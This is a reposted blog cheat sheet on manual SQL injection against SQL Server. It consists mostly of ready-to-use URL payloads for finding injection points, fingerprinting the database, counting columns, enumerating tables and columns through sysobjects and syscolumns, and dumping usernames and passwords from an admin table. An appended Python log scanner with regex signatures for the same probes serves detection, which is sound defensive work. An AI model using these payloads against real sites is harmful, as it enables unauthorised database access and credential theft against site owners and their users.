SQL Server injection

1. Determine whether the site has an injection point

① URLs containing a query string of the form ?*=variable-name

Integer:

www.target.com/1.php?id=88            normal
www.target.com/1.php?id=88-0          same as above
www.target.com/1.php?id=88-1          abnormal

String:

www.target.com/1.php?id=88 'And 'a'='a        normal
www.target.com/1.php?id=88 'And 'a'='b        abnormal

String (%2b is the URL-encoded +, SQL Server's string concatenation operator):

www.target.com/1.php?id=88            normal
www.target.com/1.php?id=88'%2b'       same as above
www.target.com/1.php?id=88'%2b's      abnormal

2. Determine the database type

Database fingerprinting

MySQL

/*!%20s*/        error means MySQL

/*!40000%20s*/   error means version above 4.0      (above 4.0 supports UNION injection)

/*!60000%20s*/   normal means version below 6.0

/*!50130%20s*/   error means version is 5.1.30

/*pc*/           // normal means MySQL

--pc supported, ; not supported      // Oracle

and exists(select @@version)--   // normal means SQL Server

Determine the column count

Finding the number of columns the page displays from the database

id=1/**/Order/**/By/**/5/**/--         normal means column count ≥ 5

id=1/**/Order/**/By/**/6/**/--         error means column count < 6

Determine the column data types

id=1/**/union/**/all/**/select/**/NULL,NULL,NULL,NULL,NULL--

id=1/**/union/**/all/**/select/**/NULL,NULL,'test',NULL,NULL--

A normal response shows that the 3rd column is a character type and can be used to display the injected SQL data.

Display the database version

id=1/**/and/**/1=2/**/union/**/all/**/select/**/NULL,NULL,@@version,NULL,NULL--

Current database name

and/**/1=2/**/union/**/all/**/select/**/NULL,db_name(),NULL,NULL,NULL from sysobjects--

Table names in a specified database (库名 is a placeholder for the database name)

and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from 库名..sysobjects where xtype='u' and name not in(select top 0 name from 库名..sysobjects where xtype='u')),NULL,NULL,NULL from sysobjects--

Table names in the current database

and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from sysobjects where xtype='u' and name not in(select top 0 name from sysobjects where xtype='u')),NULL,NULL,NULL from sysobjects--

and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from sysobjects where xtype='u' and name not in(select top 1 name from sysobjects where xtype='u')),NULL,NULL,NULL from sysobjects--

Column names

Starting at 0 and incrementing the N in the second top N walks through the column names of the admin table.

id=1/**/and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from syscolumns where id in (select id from sysobjects where name='admin') and name not in (select top 1 name from syscolumns where id in (select id from sysobjects where name='admin'))),NULL,NULL,NULL from sysobjects--

id=1/**/and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from syscolumns where id in (select id from sysobjects where name='admin') and name not in (select top 2 name from syscolumns where id in (select id from sysobjects where name='admin'))),NULL,NULL,NULL from sysobjects--

id=1/**/and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from syscolumns where id in (select id from sysobjects where name='admin') and name not in (select top 3 name from syscolumns where id in (select id from sysobjects where name='admin'))),NULL,NULL,NULL from sysobjects--

id=1/**/and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from syscolumns where id in (select id from sysobjects where name='admin') and name not in (select top 4 name from syscolumns where id in (select id from sysobjects where name='admin'))),NULL,NULL,NULL from sysobjects--

Column values

id=1 and 1=2 union all select id,username,password,NULL,NULL from admin--
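From the defender's side, the probes listed on this page share a few stable markers: /**/ in place of spaces, ORDER BY N, UNION ALL SELECT, @@version, db_name(), sysobjects/syscolumns, MySQL /*!NNNNN*/ version comments and the 'a'='a quote test. The following Python scanner is an added example (not part of the original post): it URL-decodes each request's query string, normalizes the /**/ pseudo-spaces, and flags which of those markers fire; the signature names, the log-line format and the sample log entries are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Markers drawn from the payloads on this page, matched after normalization.
SIGNATURES = [
    ("union-select", r"\bunion\s+(?:all\s+)?select\b"),
    ("order-by-probe", r"\border\s+by\s+\d+\b"),
    ("mssql-version", r"@@version"),
    ("mssql-catalog", r"\bsys(?:objects|columns)\b"),
    ("mssql-dbname", r"\bdb_name\s*\("),
    ("mysql-version-comment", r"/\*!\d*\s*\w+\*/"),
    ("quote-tautology", r"'\s*and\s*'[^']*'\s*=\s*'"),
]
# Constructed access-log sample (combined log format); 10.0.0.9 replays this page's probes.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /1.php?id=88 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /1.php?id=1/**/Order/**/By/**/5/**/-- HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /1.php?id=1/**/and/**/1=2/**/union/**/all/**/select/**/NULL,NULL,@@version,NULL,NULL-- HTTP/1.1" 500 233',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /1.php?id=88%27And%20%27a%27=%27a HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /1.php?id=88/*!40000%20s*/ HTTP/1.1" 500 233',
]
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" (?P<status>\d+)')

def normalize(query: str) -> str:
    # URL-decode, turn the /**/ pseudo-spaces used above back into spaces,
    # collapse whitespace and lowercase. MySQL /*!...*/ version comments are
    # deliberately kept so their own signature can still see them.
    decoded = unquote_plus(query)
    decoded = re.sub(r"/\*(?!!)[^*]*\*/", " ", decoded)
    return re.sub(r"\s+", " ", decoded).strip().lower()

def classify(query: str) -> list:
    # Names of every signature that fires on one query string, in SIGNATURES order.
    norm = normalize(query)
    return [name for name, pat in SIGNATURES if re.search(pat, norm)]

def scan_log(lines) -> list:
    # One finding per request whose query string matches at least one signature.
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify(m.group("path").partition("?")[2])
        if tags:
            findings.append({"ip": m.group("ip"), "status": m.group("status"),
                             "path": m.group("path"), "tags": tags})
    return findings
```

Running scan_log(SAMPLE_LOG) returns four findings, all from 10.0.0.9; in practice the 500 responses paired with these markers are the rows worth alerting on first, since they indicate the probe reached the database.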

    Original author: linkally
    Original URL: https://www.jianshu.com/p/c1e269b6d746
    This article is reposted from the web solely to share knowledge; if it infringes your rights, please contact the blogger to have it removed.